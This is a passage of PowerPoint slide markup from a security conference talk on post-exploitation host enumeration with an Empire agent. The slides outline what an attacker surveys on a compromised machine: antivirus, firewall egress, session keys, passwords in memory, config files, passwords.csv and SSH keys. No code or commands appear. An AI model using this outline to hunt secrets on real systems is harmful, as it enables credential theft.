              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anti-virus profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Software profiling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Firewall Rules/Egress</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Wingdings 3" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC1FAE03-D42D-49DE-86E7-7D72B6FB0CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="1533760"/>
            <a:ext cx="4679211" cy="3790479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" marR="0" indent="-457200" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
              <a:tabLst/>
              <a:defRPr sz="2600" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2800" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="»"/>
              <a:defRPr sz="2000" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Titillium WebRegular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Titillium WebRegular"/>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Tx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Other users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Session keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Passwords in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sensitive Files?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)configs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(dot)properties</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords.csv</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>SSH Keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECAC9C9F-45F8-4E27-9D06-DACAFE9D8BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7090226" y="3595254"/>
            <a:ext cx="3466938" cy="2840182"/>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8959981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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1212970" y="112640"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host Enumeration  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1212970" y="695179"/>
            <a:ext cx="9404723" cy="713064"/>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Assumptions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A2F70FD-D8F7-4E32-8150-5383EF3175F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0960C439-0BEF-4E13-80CE-7AF424D7CC9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101868" y="3317956"/>
            <a:ext cx="1038046" cy="1140710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84B457D-A369-42A0-BE90-EE1E920925BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5678395" y="4270863"/>
            <a:ext cx="1983886" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66DE040A-C48C-4676-AC1E-3467FEB2B256}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9964886" y="4289389"/>
            <a:ext cx="1983886" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Machine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{437CDFCD-726B-4F1C-B6BF-6314912BDF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="1"/>
            <a:endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7139914" y="3888311"/>
            <a:ext cx="3236993" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0D4357A-F313-4007-B75B-31176E32B788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8023237" y="3518979"/>
            <a:ext cx="1714500" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire Agent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFCBB750-1FD5-4BE3-94AC-635EE101498A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274015" y="2396078"/>
            <a:ext cx="4931064" cy="3416320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Owned a machine on the inside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Have an Empire Agent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Graphic 12" descr="Laptop">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EC294AD-B207-41A3-B53E-CBE7E8F9D6F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376907" y="3317956"/>
            <a:ext cx="1038046" cy="1140710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12525740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9FC6F7-025A-4B77-85F2-6DAA83802F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321075" y="752168"/>
            <a:ext cx="11549849" cy="1966233"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Ryan Preston ~ Depth Security</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Slides: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/h3xg4m3s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D58C8046-6833-4883-9773-299B9DF46C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321075" y="3787262"/>
            <a:ext cx="11870925" cy="861421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="7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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Twitter:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> *Slides also linked in latest tweet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50796D75-ADF4-4C2C-A922-413A0FD4E17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321075" y="5110077"/>
            <a:ext cx="11870925" cy="1360415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="7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000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slack:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>awsm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="shield_mark.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF0C925-114A-4912-8B13-5159F3E3F5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72565" y="497768"/>
            <a:ext cx="854277" cy="1011643"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5858904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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agent List</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{457C64C7-D221-4046-A188-AAAF54DFD0A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1940548"/>
            <a:ext cx="12148426" cy="3777969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F31BCB3A-D714-4574-B6AF-6503AA36427F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2443447" y="4719150"/>
            <a:ext cx="2438401" cy="512618"/>
